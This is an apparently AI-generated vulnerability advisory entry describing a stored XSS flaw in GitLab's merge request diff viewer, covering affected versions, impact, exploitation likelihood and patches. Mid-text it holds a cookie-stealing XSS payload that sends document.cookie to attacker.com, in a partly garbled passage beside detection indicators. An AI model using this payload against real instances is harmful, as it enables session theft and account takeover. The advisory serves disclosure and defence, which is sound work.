
Cloud Vulnerability DB
Eine von der Community geführte Datenbank für Schwachstellen
CVE-2026-84739 is a stored Cross-Site Scripting (XSS) vulnerability in GitLab CE/EE affecting all versions from 13.11 before 19.2.7, 19.3 before 19.3.3, and 19.4 before 19.4.1. The flaw exists in the merge request diff viewer, where improper sanitization of path components allows an authenticated user to execute arbitrary JavaScript in the context of another user's browser session. It was published on September 29, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 base score of 8.7 (High) (GitHub Advisory, GitLab Patch Release).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically arising from insufficient sanitization of file path components rendered in GitLab's merge request diff viewer. An authenticated attacker with at least low-level privileges can craft a merge request containing a maliciously named file path that, when the diff is viewed by another user, causes the unsanitized path to be interpreted as executable JavaScript in the victim's browser. The attack requires network access and victim interaction (viewing the malicious diff), but no elevated privileges beyond a basic authenticated account. The vulnerability was originally reported via HackerOne report #3938482 (GitHub Advisory, GitLab Patch Release).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser session of any user who views the malicious merge request diff, enabling theft of session tokens, account impersonation, unauthorized actions performed on behalf of the victim (such as modifying code, approving merge requests, or accessing private repositories), and potential lateral movement within the GitLab instance. Both confidentiality and integrity are rated High, as an attacker could exfiltrate sensitive data or tamper with repository content under the victim's identity. Availability is not directly impacted (GitHub Advisory, Feedly).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The NVD SSVC assessment confirms exploitation status as "none" and notes the attack is not automatable, requiring victim interaction. The EPSS score is approximately 0.36–0.47%, placing it in the 38th percentile for exploitation likelihood within 30 days. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Qualys has added detection for this vulnerability (detection ID 532798) (GitHub Advisory).
<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.txt) that will be rendered unsanitized in the merge request diff viewer.<, >, onerror, script); access log entries for merge request diff pages followed by external resource fetches.GitLab has released patched versions 19.2.7, 19.3.3, and 19.4.1 for both Community Edition (CE) and Enterprise Edition (EE). All administrators should upgrade to one of these versions immediately. If immediate patching is not feasible, a temporary workaround is to restrict access to merge request diff viewing or disable the merge request diff viewer feature until the patch can be applied. Organizations should also audit recent merge requests for file paths containing suspicious characters (GitLab Patch Release, GitHub Advisory).
The patch release attracted coverage from several security news outlets, including SecurityOnline, CyberSecurityNews, Heise, and Cryptika, largely in the context of a broader GitLab patch release that also addressed other critical vulnerabilities (SecurityOnline, CyberSecurityNews, Heise). Social media discussion on Bluesky noted the vulnerability alongside other GitLab issues in the same patch cycle. Community sentiment focused primarily on the higher-severity RCE vulnerabilities in the same release, with this XSS issue receiving moderate attention given its High CVSS score and broad version range affected.
Quelle: Dieser Bericht wurde mithilfe von KI erstellt
Kostenlose Schwachstellenbewertung
Bewerten Sie Ihre Cloud-Sicherheitspraktiken in 9 Sicherheitsbereichen, um Ihr Risikoniveau zu bewerten und Lücken in Ihren Abwehrmaßnahmen zu identifizieren.
Eine personalisierte Demo anfordern
"Die beste Benutzererfahrung, die ich je gesehen habe, bietet vollständige Transparenz für Cloud-Workloads."
"„Wiz bietet eine zentrale Oberfläche, um zu sehen, was in unseren Cloud-Umgebungen vor sich geht.“ "
"„Wir wissen, dass, wenn Wiz etwas als kritisch identifiziert, es auch wirklich kritisch ist.“"